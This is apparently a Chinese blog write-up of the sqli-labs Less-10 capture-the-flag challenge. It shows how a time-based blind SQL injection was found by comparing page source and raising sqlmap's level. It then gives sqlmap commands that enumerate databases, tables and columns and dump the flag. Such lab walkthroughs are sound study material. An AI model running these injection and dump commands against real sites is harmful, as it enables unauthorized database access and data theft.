sqli-labs
1
点击启动靶机。
SQLi-LABS Page-1(Basic Challenges)
解法
发送 GET 请求,id 作为参数。
http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1
用 sqlmap 扫描:
sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1 --batch
没有检测到注入点。
改变参数。
http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=-1
看起来没什么变化。
比较源代码。
view-source:http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1
<font size="5" color="#FFFF00">You are in...........<br></font></font> </div></br></br></br><center>
view-source:http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=-1
查询不到的时候多了一些 tag。
<font size="5" color="#FFFF00">You are in...........</br></font><font color= "#0000ff" font size= 3></font> </div></br></br></br><center>
将 level 提高。
sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1 --batch --level 2
可以注入。
爆库名:
sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1 --batch --technique T --threads 10 --dbs
爆表名:
sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1 --batch --technique T --threads 10 -D ctftraining --tables
爆列名:
sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1 --batch --technique T --threads 10 -D ctftraining -T flag --columns
查询 flag。
sqlmap -u http://a1279138-1620-4acb-943d-5c7d50778e14.node5.buuoj.cn/Less-10/?id=1 --batch --technique T --threads 10 -D ctftraining -T flag -C flag --dump
时间盲注太慢了,折磨人。
Flag
flag{6baf6140-4646-4f31-bb61-e42b13de98a1}
参考资料
声明
本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规。
博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规,不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任。